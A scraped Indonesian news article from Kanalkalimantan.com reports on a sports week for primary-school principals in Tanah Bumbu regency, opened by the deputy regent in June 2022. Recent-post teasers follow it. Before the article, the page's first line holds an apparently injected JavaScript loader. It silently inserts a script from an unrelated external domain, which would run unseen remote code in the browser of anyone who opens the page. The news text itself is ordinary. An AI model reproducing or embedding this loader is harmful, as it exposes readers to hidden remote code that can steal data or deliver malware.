(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Tanah Bumbu

Pekan Olahraga K3SD Tanbu Ajang Silaturahmi dan Prestasi


KANALKALIMANTAN.COM, BATULICIN – Wakil Bupati Tanah Bumbu (Tanbu) HM Rusli membuka Pekan Olahraga K3SD IV tingkat Kabupaten Tanbu di SDN Sepakat, Kecamatan Mantewe, Selasa (7/6/2022).

Kegiatan digelar oleh Kelompok Kerja Kepala Sekolah Dasar (K3SD) Kabupaten Tanbu berlangsung selama selama dua hari, 7-8 Juni 2022.

“Ada 200 kepala sekolah, 39 pengawas, serta 10 Korwil Kabupaten Tanah Bumbu mengikuti lomba bola voli, bulu tangkis, catur dan tenis meja,” terang Ketua Panitia Pelaksana Pekan Olahraga K3SD, Zulkifli SE.

Zuklifli menambahkan, kegiatan selain guna mempererat tali silaturahmi antar peserta, bertujuan sebagai media refreshing dari rutinitas keseharian di lingkungan sekolah.

 

 

Baca juga  : Gudang Kosong Terbakar Habis di Al Jafri Kemuning, Kerugian Ditaksir Rp 15 juta

Sementara itu, Ketua Pembina K3SD Kabupaten Tanbu, Suroto mengatakan, pekan olahraga K3SD ini menjadi wahana refreshing dan silaturahmi semua kepala sekolah di Tanbu.

Semua kepala sekolah di Tanbu bisa disatukan dalam satu acara olahraga , mengingat di tahun sebelumnya pelaksanan tertunda akibat pandemi Covid-19.

Sementara itu, Wakil Bupati Tanbu HM Rusli mengharapkan, momentum ini menjadi pemersatu dan mempererat persaudaraan antar kepala sekolah, selain sebagai ajang kompetisi prestasi.

HM Rusli berharap, pekan olahraga K3SD ini didapatkan peserta yang berkompeten di bidang olahraga dan bisa mewakili Kabupaten Tanah Bumbu ke tingkat provinsi.

 

Baca juga  : Anies Baswedan Didukung Eks Anggota FPI dan HTI Jadi Capres

“Kami juga menyambut baik pemberian santunan kepada anak yatim yang ada di Kecamatan Mantewe. Semoga semua senantiasa yang diberikan dapat membantu memenuhi kebutuhan dan memberikan kebahagiaan untuk mereka,” katanya.

Acara ini juga dihadiri Forkopimda Tanbu dan rombongan Camat Mantewe, Bhabinkamtibmas Polsek Mantewe, Babinsa Koramil Mentewe, Korwil, pengawas dan pembina se Kabupaten Tanbu, serta para undangan lainnya. (Kanalkalimantan.com/ftr)

Reporter : ftr
Editor : kk


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

10 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

10 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

10 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

11 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

11 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

11 jam ago

This website uses cookies.